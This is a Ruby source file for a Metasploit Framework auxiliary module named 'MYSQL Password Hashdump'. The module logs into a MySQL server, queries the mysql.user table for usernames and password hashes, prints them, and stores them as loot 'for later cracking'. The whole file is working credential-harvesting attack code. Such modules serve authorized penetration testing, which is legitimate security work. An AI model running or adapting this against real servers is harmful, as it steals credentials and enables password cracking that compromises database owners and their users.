## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'MYSQL Password Hashdump', 'Version' => '$Revision$', 'Description' => %Q{ This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking. }, 'Author' => ['TheLightCosine '], 'License' => MSF_LICENSE ) end def run_host(ip) if (not mysql_login_datastore) print_error("Invalid MySQL Server credentials") return end #Grabs the username and password hashes and stores them as loot res = mysql_query("SELECT user,password from mysql.user") if res.nil? print_error("There was an error reading the MySQL User Table") return end this_service = report_service( :host => datastore['RHOST'], :port => datastore['RPORT'], :name => 'mysql', :proto => 'tcp' ) #create a table to store data tbl = Rex::Ui::Text::Table.new( 'Header' => 'MysQL Server Hashes', 'Indent' => 1, 'Columns' => ['Username', 'Hash'] ) if res.size > 0 res.each do |row| tbl << [row[0], row[1]] print_good("Saving HashString as Loot: #{row[0]}:#{row[1]}") end end report_hashes(tbl.to_csv, this_service) unless tbl.rows.empty? end #Stores the Hash Table as Loot for Later Cracking def report_hashes(hash_loot,service) filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_mysqlhashes.txt" path = store_loot("mysql.hashes", "text/plain", datastore['RHOST'], hash_loot, filename, "MySQL Hashes",service) print_status("Hash Table has been saved: #{path}") end end